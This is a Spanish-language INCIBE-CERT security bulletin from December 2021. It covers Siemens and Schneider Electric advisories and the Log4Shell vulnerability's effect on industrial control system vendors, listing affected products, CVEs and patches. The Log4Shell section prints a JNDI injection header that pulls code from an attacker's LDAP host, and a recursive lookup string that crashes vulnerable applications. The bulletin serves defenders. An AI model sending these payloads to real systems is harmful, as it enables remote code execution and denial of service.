Inicio / Content / Boletín de INCIBE-CERT del 14-12-2021

Boletín de INCIBE-CERT del 14-12-2021

Avisos de seguridad de Siemens de diciembre de 2021

Fecha de publicación: 
14/12/2021
Importancia: 
5 - Crítica
Recursos afectados: 
  • Teamcenter Active Workspace, versiones:
    • 4.3: anteriores a 4.3.11;
    • 5.0: anteriores a 5.0.10;
    • 5.1: anteriores a 5.1.6;
    • 5.2: anteriores a 5.2.3.
  • SiPass integrated, todas las versiones de:
    • 2.76;
    • 2.80;
    • 2.85.
  • Simcenter STAR-CCM+ Viewer, versiones anteriores a 2021.3.1;
  • SIMATIC eaSie PCS 7 Skill Package (6DL5424-0BX00-0AV8), versiones anteriores a 21.00 SP3;
  • JT Utilities, versiones anteriores a 12.8.1.1;
  • JTTK, versiones anteriores a 10.8.1.1;
  • Versiones anteriores a 3.2.1.0 de:
    • SIMATIC ITC1500 V3,
    • SIMATIC ITC1500 V3 PRO,
    • SIMATIC ITC1900 V3,
    • SIMATIC ITC1900 V3 PRO,
    • SIMATIC ITC2200 V3,
    • SIMATIC ITC2200 V3 PRO.
  • Todas las versiones de:
    • ModelSim Simulation,
    • Questa Simulation.
  • Siveillance Identity:
    • V1.5: todas las versiones;
    • V1.6: versiones anteriores a 1.6.284.0.
  • Versiones anteriores a 2.41 de:
    • POWER METER SICAM Q100 (7KG9501-0AA01-0AA1),
    • POWER METER SICAM Q100 (7KG9501-0AA01-2AA1),
    • POWER METER SICAM Q100 (7KG9501-0AA31-0AA1),
    • POWER METER SICAM Q100 (7KG9501-0AA31-2AA1).
  • SINUMERIK Edge, versiones anteriores a 3.2;
  • versiones anteriores a 13.2.0.5 de:
    • JT2Go,
    • Teamcenter Visualization.
  • Capital VSTAR, versiones con las opciones Ethernet habilitadas.
Descripción: 

Siemens ha publicado en su comunicado mensual varias actualizaciones de seguridad de diferentes productos.

Solución: 

Las actualizaciones que corrigen las vulnerabilidades indicadas pueden obtenerse desde el panel de descarga de Siemens. Para los productos sin actualizaciones disponibles es recomendable aplicar las medidas de mitigación descritas en la sección de Referencias.

Detalle: 

Siemens, en su comunicado mensual de parches de seguridad, ha emitido un total de 14 avisos de seguridad.

  • Múltiples vulnerabilidades de LibVNC en varios productos podrían permitir la ejecución remota de código, la divulgación de información y los ataques de denegación de servicio en determinadas condiciones. Se han asignado los identificadores: CVE-2017-18922, CVE-2018-20019, CVE-2018-20748, CVE-2018-20749, CVE-2018-20750, CVE-2019-15690 y CVE-2019-20788 para estas vulnerabilidades críticas.
  • Recientes investigaciones de seguridad identifican puntos débiles en la práctica recomendada por la IEEE 1735 para el cifrado de la IP de diseño, lo que podría permitir a un atacante sofisticado el acceso a datos de IP de diseño sin cifrar en los productos que cumplen con la norma IEEE 1735. Se ha asignado el identificador CVE-2021-42023 para esta vulnerabilidad crítica.
  • POWER METER SICAM Q100 contiene una vulnerabilidad que podría permitir a un atacante ejecutar código de forma remota. Se ha asignado el identificador CVE-2021-44165 para esta vulnerabilidad crítica.

Los tipos de nuevas vulnerabilidades, no críticas, publicadas se corresponden con los siguientes:

  • limitación incorrecta del nombre de ruta a un directorio restringido (path traversal),
  • exposición de recursos,
  • escritura fuera de límites,
  • uso de memoria después de ser liberada,
  • lectura fuera de límites,
  • exposición de información sensible,
  • inicialización incorrecta,
  • desbordamiento de búfer basado en pila (stack),
  • restricción de operaciones inadecuada dentro de los límites del búfer de memoria,
  • desreferencia a puntero NULL,
  • validación de certificado incorrecto,
  • uso de variable no inicializada,
  • confusión de tipos,
  • desbordamiento de enteros.

Los identificadores CVE asignados para estas vulnerabilidades, no críticas, pueden consultarse en la sección 'vulnerability classification' de cada aviso de Siemens.

Encuesta valoración

[Actualización 22/12/2021] Múltiples vulnerabilidades en productos de Schneider Electric

Fecha de publicación: 
14/12/2021
Importancia: 
5 - Crítica
Recursos afectados: 
  • IGSS Data Colleca (dc.exe), V15.0.0.21320 y anterior;
  • EVlink City EVC1S22P4 / EVC1S7P4, versiones anteriores a R8 V3.4.0.2;
  • EVlink Parking EVW2 / EVF2 / EVP2PE, versiones anteriores a R8 V3.4.0.2;
  • EVlink Smart Wallbox EVB1A, versiones anteriores a R8 V3.4.0.2;
  • EcoStruxure™ Power Moniaing Expert 9.0 y anteriores;
  • AP7xxxx y AP8xxx con NMC2, V6.9.6 o anteriores;
  • AP7xxx y AP8xxx con NMC3, V1.1.0.3 o anteriores;
  • APDU9xxx con NMC3, V1.0.0.28 o anteriores.
Descripción: 

Schneider Electric ha reportado 11 vulnerabilidades, 1 crítica, 5 altas y 5 de severidad media, por las que un atacante podría realizar una denegación de servicio, el acceso no autorizado al servidor web de la estación de carga, ejecución de código arbitrario, ejecución de código web malicioso o provocar el funcionamiento involuntario del dispositivo.

Solución: 
  • IGSS Data Collector: versión 15.0.0.21321 del módulo IGSS DC. Disponible para su descarga a través de IGSS Master > Update IGSS Software o descargando el ZIP de actualización;
  • EVlink City EVC1S22P4 / EVC1S7P4: actualizar el firmware;
  • EVlink Parking EVW2 / EVF2 / EVP2PE: actualizar el firmware;
  • EVlink Smart Wallbox EVB1A: actualizar el firmware;
  • EcoStruxure™ Power Monitoring actualizar a Expert 2020 o superior a través de su ISO;
  • AP7xxxx y AP8xxx con NMC2 actualizar a V7.0.6.;
  • AP7xxx y AP8xxx con NMC3 actualizar a V1.2.0.2;
  • APDU9xxx con NMC3 actualizar a V1.2.0.2.
Detalle: 
  • Una vulnerabilidad de falsificación de solicitudes del lado del servidor (SSRF) que podría hacer que el servidor web de la estación de carga reenvíe solicitudes a objetivos de red no deseados cuando se envían parámetros maliciosos elaborados al servidor web de la estación de carga Se ha asignado el identificador CVE-2021-22821 para esta vulnerabilidad de severidad crítica.
  • Una vulnerabilidad de falsificación de solicitud de sitio cruzado (CSRF) que podría permitir a un atacante hacerse pasar por el usuario o realizar acciones en su nombre cuando se envían parámetros maliciosos en las solicitudes POST enviadas al servidor web de la estación de carga. Se ha asignado el identificador CVE-2021-22724 para esta vulnerabilidad.
  • Realizar acciones no deseadas cuando se envían parámetros maliciosos en solicitudes GET enviadas al servidor web de la estación de carga. Se ha asignado el identificador CVE-2021-22725 para esta vulnerabilidad.
  • Una restricción inadecuada de intentos de autenticación excesivos podría permitir el acceso no autorizado a la interfaz web de la estación de carga realizando ataques de fuerza bruta. Se ha asignado el identificador CVE-2021-22818 para esta vulnerabilidad.
  • La caducidad de sesión podría permitir un acceso no autorizado a través de una sesión secuestrada al servidor web de la estación de carga, incluso después de que el titular legítimo de la cuenta de usuario haya cambiado su contraseña. Se ha asignado el identificador CVE-2021-22820 para esta vulnerabilidad.
  • La neutralización inadecuada de la entrada durante la generación de la página web ('Cross-site Scripting') podría hacerse pasar por el usuario que gestiona la estación de la estación de carga o llevar a cabo acciones en su nombre cuando se envían parámetros maliciosos al servidor web de la estación de carga. Se ha asignado el identificador CVE-2021-22822 para esta vulnerabilidad.

Para las vulnerabilidades de severidad media se han asignado los identificadores: CVE-2021-22819, CVE-2021-22823, CVE-2021-22824, CVE-2021-22826 y CVE-2021-22827.

[Actualización 22/12/2021]: Un atacante remoto podría acceder al sistema con privilegios elevados cuando una cuenta privilegiada hace clic en una URL maliciosa que compromete el token de seguridad. Se ha asignado el identificador CVE-2021-22825 para esta vulnerabilidad.

Encuesta valoración

[Actualización 23/12/2021] Vulnerabilidad Log4Shell afecta a Sistemas de Control Industrial

Fecha de publicación: 
14/12/2021
Importancia: 
5 - Crítica
Recursos afectados: 

La vulnerabilidad conocida como Log4Shell, detectada en la librería Log4j2 mantenida por Apache Software Foundation, desde la versión 2.0-beta9 hasta la versión 2.14.1, y descrita en nuestro aviso técnico, también ha afectado a fabricantes de Sistemas de Control Industrial.

Entre los fabricantes SCI que integran esta librería y han informado de la vulnerabilidad en sus productos están:

  • Philips:
    • IntelliSpace Precision Medicine (productos sólo de software con sistemas operativos propiedad del cliente),
    • RIS Clinic,
    • IntelliBridge Enterprise (B.13-B.15) (productos sólo de software con sistemas operativos propiedad del cliente),
    • VuePACS,
    • ISPACS (el entorno de hosting de Philips está evaluando la solución proporcionada por VMware y está en proceso de implementación para los clientes de servicios gestionados),
    • [Actualización 22/12/2021] HealthSuite Marketplace (1.2) (el entorno hosting de Philips ha desplegado un parche),
    • IntelliSite Pathology Solution 5.1 (L1),
    • Pathology De-identifier 1.0 (L1),
    • Performance Bridge (3.0) (productos sólo de software con sistemas operativos propiedad del cliente. Para las soluciones de productos en los que el servidor fue proporcionado por Philips, será responsabilidad de Philips validar y proporcionar parches),
    • Pinnacle (18.x),
    • Protocol Applications (1.1) (productos sólo de software con sistemas operativos propiedad del cliente. Para las soluciones de productos en los que el servidor fue proporcionado por Philips, será responsabilidad de Philips validar y proporcionar parches),
    • Scanner Protocol Manager (1.1) (productos sólo de software con sistemas operativos propiedad del cliente. Para las soluciones de productos en los que el servidor fue proporcionado por Philips, será responsabilidad de Philips validar y proporcionar parches),
    • Tasy EMR (productos sólo de software con sistemas operativos propiedad del cliente),
    • Universal Data Manager (UDM).
    • [Actualización 29/03/2022] IntelliVue XDS, productos software con sistemas operativos propiedad del cliente. En el caso de las soluciones de productos en las que se ha proporcionado el servidor, es responsabilidad del cliente validar e implantar los parches.
  • Siemens:
    • E-Car OC Cloud Application, versiones anteriores a 2021-12-13;
    • EnergyIP Prepay, versiones 3.7 y 3.8;
    • todas las versiones de:
      • Industrial Edge Management App (IEM-App);
      • Industrial Edge Management OS (IEM-OS);
      • Industrial Edge Management Hub;
      • LOGO! Soft Comfort;
      • Mendix Applications;
      • Siveillance Control Pro;
      • Siveillance Vantage.
    • Mindsphere Cloud Application, versiones anteriores a 2021-12-11;
    • Operation Scheduler, versión 1.1.3 y superiores;
    • SIGUARD DSA, versiones 4.2, 4.3 y 4.4;
    • SIMATIC WinCC 7.4, versiones anteriores a 7.4 SP1;
    • Siveillance Command, versión 4.16.2.1 y superiores.
    • [Actualización 15/12/2021] Nuevos productos afectados:
      • Desigo CC Info Center, versiones V5.0 y V5.1;
      • Desigo CC Advanced Reporting, versiones V4.0, V4.1, V4.2, V5.0 y V5.1;
      • Comos Desktop App, todas las versiones;
      • Capital, versión 2019.1 SP1912 y superiores, solo si la funcionalidad Teamcenter integration está activada.
    • [Actualización 16/12/2021] puede consultar la lista completa de productos afectados en su página web;
    • [Actualización 17/12/2021] se ha publicado un nuevo producto afectado en su página web;
    • [Actualización 21/12/2021] TraceAlertServerPLUS, todas las versiones.
    • [Actualización 22/12/2021] Distintos modelos de Sensformer Platform, en versiones anteriores a 2.7.0.
  • Rockwell Automation:
    • Plex (A Rockwell Automation Company) Industrial IoT;
    • Fiix (A Rockwell Automation Company) CMMS core V5.
    • [Actualización 16/12/2021] puede consultar la lista completa de productos afectados en su página web;
  • HMS
    • Ewon Talk2M;
    • [Actualización 21/12/2021] eCatcher Windows.

[Actualización 15/12/2021] Nuevos fabricantes afectados:

  • Wibu-Systems:
    • CodeMeter Keyring for TIA Portal, versiones anteriores a la 1.30 (solo afecta a Password Manager);
    • CodeMeter Cloud Lite, versiones anteriores a la 2.2.
  • Johnson Controls:
    • se está analizando el impacto de esta vulnerabilidad en sus productos.
    • se recomienda revisar las guías hardening y deployment de productos para garantizar que se han desplegado de acuerdo con los requisitos de diseño y funcionamiento del producto.
    • [Actualización 21/12/2021] exacq Enterprise Manager, versión 21.12 y anteriores.
    • [Actualización 22/12/2021] OpenBlue Bridge y RFID Overhead360° Backend.
  • Wind River:
    • Wind River Studio Analytics.

[Actualización 16/12/2021] Nuevos fabricantes afectados:

  • Schneider Electric, puede consultar la lista de productos afectados en su página web;
  • ABB, puede consultar la lista de productos afectados en su página web. Algunos de sus productos se ven afectados por la vulnerabilidad CVE-2021-4104;
  • B&R, puede consultar la lista de productos afectados en su página web. Algunos de sus productos se ven afectados por la vulnerabilidad CVE-2021-4104;
  • Phoenix Contact, puede consultar la lista de productos afectados en su página web;
  • HMS, puede consultar la lista de productos afectados en su página web.

[Actualización 17/12/2021] Nuevos fabricantes afectados:

  • General Electric, puede consultar la lista de productos afectados en su página web;
  • Philips, puede consultar la lista de productos afectados en su página web.
  • [Actualización 22/12/2021] Bosch, puede consultar la lista de productos afectados en sus páginas web BOSCH-SA-572602 [Actualización 23/12/2021] y BOSCH-SA-993110-BT.

Además, cabe destacar la importancia de analizar y revisar la afectación de otros productos y servicios de ámbito interno.

[Actualización 20/12/2021] Se ha detectado una vulnerabilidad de denegación de servicio (DoS), de severidad alta, que afecta a las versiones 2.0-alpha1 hasta 2.16, concretamente al archivo log4j-core JAR, y que lleva asociada el identificador CVE-2021-45105.

[Actualización 23/12/2021] La vulnerabilidad CVE-2021-45105 afecta a las versiones 2.0-beta9 hasta 2.16.0 excluyendo 2.12.3. La vulnerabilidad CVE-2021-45046 afecta a las versiones 2.0-beta9 hasta 2.15.0 excluyendo 2.12.2.

Descripción: 

Chen Zhaojun, investigador de Alibaba Cloud Security Team, ha descubierto una vulnerabilidad 0day crítica, que se ha denominado Log4Shell, que podría ser explotada por un atacante remoto no autenticado para ejecutar código arbitrario (RCE), y que varios fabricantes de SCI han detectado en algunos de sus productos.

Solución: 
  • [Actualización 15/12/2021] La versión 2.15.0 no soluciona completamente la vulnerabilidad ya que estaba incompleta en determinadas configuraciones, lo que podría permitir a un atacante la denegación del servicio. La versión Log4j 2.16.0 soluciona este problema eliminando el soporte para los patrones de búsqueda de mensajes y desactivando la funcionalidad JNDI por defecto. Como medidas de mitigación, aplicar las que aparecen listadas en el apartado Solución de nuestro aviso técnico.
  • Para los productos de Siemens, actualizar a las versiones indicadas en el apartada AFFECTED PRODUCTS AND SOLUTION de [Actualización 22/12/2021] sus avisos SSA-661247 y SSA-479842.
  • Para los productos de Rockwell Automation:
    • Plex Industrial IoT: no es necesario que el usuario actúe, ya que el producto ya tiene aplicada la mitigación y ya no está afectado. Además, el 13/12/21 se publicará un parche para actualizar Log4j2 a la versión 2.15.
    • Fiix CMMS core V5: no es necesaria ninguna acción por parte del usuario, ya que el producto se ha actualizado a la versión 2.15 de Log4j2.
  • HMS Ewon ha aplicado los parches necesarios en su infraestructura cloud Talk2M. [Actualización 21/12/2021] Actualizar eCatcher Windows a la versión 6.7.7.
  • [Actualización 15/12/2021] Soluciones para los nuevos productos afectados:
    • Wibu-Systems si en los productos afectados se está utilizando Wibu-Systems’ hosting service (WOPS), no es necesario realizar ninguna acción. En caso contrario, actualizar log4j a la versión 2.16.0.
    • Johnson Controls está analizando el impacto de esta vulnerabilidad, publicarán cualquier parche recomendado o actualización de productos en su página web de seguridad de productos. [Actualización 21/12/2021] Actualizar exacq Enterprise Manager a la versión 21.12.1 o aplicar los pasos de mitigación manual.
    • Wind River Studio Analytics contiene una versión vulnerable de Log4j, están trabajando para desarrollar, testear y lanzar un parche lo antes posible.
  • [Actualización 16/12/2021] Soluciones para los nuevos productos afectados:
    • Para los productos Schneider Electric, actualizar a las versiones indicadas en el apartada Final Remediation/Mitigation de su aviso;
    • Para los productos ABB, actualizar a las versiones indicadas en el apartada General security recommendations de su aviso;
    • Para los productos B&R, actualizar a las versiones indicadas en el apartada Supporting information and guidelines de su aviso;
    • Para los productos Phoenix Contact, actualizar a las versiones indicadas en el apartada General recommendation de su aviso;
    • Para los productos HMS, actualizar a las versiones indicadas en el apartada HMS Recommendations de su aviso.
  • [Actualización 20/12/2021] Para corregir la vulnerabilidad de DoS identificada con CVE-2021-45105, los usuarios de Java 8 (o posteriores) deben actualizar Log4j a la versión 2.17.0. Adicionalmente, se pueden adoptar unas medidas de mitigación en la configuración.
  • [Actualización 22/12/2021] Para los productos Bosch afectados, actualizar a la última versión de IoT Gateway y aplicar las medidas de mitigación descritas en su aviso. [Actualización 23/12/2021] Actualizar el firmware de PRA-APAS a la versión 1.0.32.
  • [Actualización 23/12/2021] CISA, FBI, NSA, ACSC, CCCS, CERT NZ, NZ NCSC y NCSC-UK han publicado un aviso conjunto de ciberseguridad, en forma de alerta AA21-356A, para proporcionar una guía de mitigación de las vulnerabilidades en la librería de software Log4j de Apache.
  • [Actualización 23/12/2021] Para solucionar CVE-2021-45105, actualizar a Log4j 2.3.1 (para Java 6), 2.12.3 (para Java 7) o 2.17.0 (para Java 8 y posteriores). Para solucionar CVE-2021-45046, actualizar a Log4j 2.3.1 (para Java 6), 2.12.3 (para Java 7) o 2.17.0 (para Java 8 y posteriores).
Detalle: 

La vulnerabilidad se origina de la forma en que los mensajes de registro son gestionados por el procesador Log4j. Si un atacante envía un mensaje especialmente diseñado:

User-Agent: ${jndi:ldap://<host>:<port>/<path>}

Podría resultar en la carga de una clase de código externo o la búsqueda de mensajes y la ejecución de ese código, lo que llevaría a una RCE. Se ha asignado el identificador CVE-2021-44228 para esta vulnerabilidad.

Debido a que algunas funciones de Apache Log4j realizan análisis recursivos, los atacantes podrían diseñar peticiones maliciosas para desencadenar vulnerabilidades de ejecución remota de código.

IMPORTANTE: esta vulnerabilidad podría estar explotándose de manera activa.

[Actualización 20/12/2021] Si se intenta una sustitución de cadena en la cadena que aparece a continuación, se desencadenará una recursión infinita, y la aplicación se bloqueará:

${${::-${::-$${::-j}}}}

Encuesta valoración